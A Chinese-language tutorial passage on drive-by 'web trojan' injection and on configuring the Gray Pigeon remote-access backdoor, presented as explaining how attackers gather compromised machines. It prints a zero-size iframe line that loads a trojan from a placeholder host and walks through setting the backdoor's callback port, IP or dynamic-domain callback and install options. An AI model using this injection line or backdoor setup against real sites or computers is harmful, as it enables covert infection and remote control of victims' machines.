网络安全检测|网络安全服务|网络安全扫描-香港墨客投资移动版

网页挂马就是攻击者利用某网站存在的漏洞，进而利用该漏洞对该网站进行入侵，最终取得webshell。然后通过自己配置和经过调试过的网马的地址批量插入或指定插入某个页面，从而达到挂马的目的。常见的挂马方式是框架嵌入式网络挂马，其主要利用iframe语句，代码格式为：

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

当浏览者打开刚网页后，除了加载该网页本身的内容后，还会加载攻击者在该网页上添加的这一句代码，这时浏览者的电脑就会悄悄的远程下载该木马并且运行，这时候如果该浏览者电脑上没有杀毒软件或杀毒软件过期，那么他将会在自己毫不知情的情况下成为了攻击者的“肉鸡“了。

该方法可以说是木马传播速度最快也是最为隐秘的手段了，大多数的黑客爱好者都是喜欢用这个方法来传播木马的，他们一般都热衷于入侵那些有注入点或有漏洞的网站，取得它们的webshell后，进行批量挂马。一般这些人他们的编程水平和数据库的知识都是很有一定基础的，如果他们将这些知识和经验利用到安全领域的话，应该会有一番作为的。

此方法的运用范围广，所有用过电脑上网的人都有可能会中招，不过这也不是不能防范的，只要我们平时注意杀毒软件的更新，还有装一些针对网页挂马的防护软件，一般你不小心浏览到有挂马的网站的时候，这些软件就会提醒你该网页可能存在网页木马信息，提醒你不要去浏览，这样我们就可以避免在浏览网页的时候，在毫无之情的情况下成为了人家的“肉鸡”了。

说了那么多木马，接下来我们也来说说生成这些木马的工具。这些木马工具，我们也称为远程控制软件，本来这些远程控制软件是用于企事业单位、个人用户，提供远程办公，企业及个人用户节省人物财力的同时，提高工作效率。这些远程控制软件一般都有以下功能：远程开关机，批量管理电脑，遥控鼠标、键盘，屏幕监控，文件管理，低成本打造智能安防监控系统等服务。

但是就是有些居心不良的人，利用这些软件进行黑客入侵，对个人、或企事业单位的电脑进行破坏。以下我们就通过介绍两款国内比较常见的远程控制软件来进行实例演示，来讲解黑客们是怎样“肉鸡”成群、怎样监控“肉鸡”，并了解下这些“肉鸡”有什么用途。

3.1 灰鸽子远控实例演示

3.1.1 灰鸽子远控的介绍

灰鸽子(Backdoor.gpigeon)是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。

灰鸽子客户端和服务器端都采用Delphi代码编写。黑客利用客户端程序即可配置出服务端程序。可配置的信息主要包括上线类型、主动连接时使用的公网IP（域名）、连接密码、使用的端口、启动项名称、服务名称、进程隐藏方式、使用的壳、是否启用代理、图标修改等。

3.1.2 灰鸽子的配置

首先我们先打开灰鸽子2007黑防无壳专版（图3-1）：

3-1 灰鸽子主界面

查看系统配置（图3-2）：

图3-2 系统设置

在这边我们主要可以对鸽子的上线端口进行修改，从上面我们可以看出我们的上线端口是8000。

点击配置服务端，我们来配置下服务器，首先是自动上线配置，具体如图3-3所示：

图3-3 自动上线设置

由于我是本地测试，所以使用的是本地的ip：127.0.0.1，也可以使用域名上线，大家可以到自己注册申请域名，再利用该软件提供的域名更新工具，对自己的域名进行在线IP更新，这样每次运行该更新工具，就能实现域名的IP地址每时每刻都指向我们的计算机，这样服务端每次连接到该域名的时候就能通过该域名连接到我们计算机上的客户端了。此处我不主要介绍ftp上线，因为ftp上线比较繁琐，还要上网找个免费的空间，然后收发上线信息，所以我提倡使用域名上线比较方便快捷。

安装选项（图3-4）：

图3-4安装选项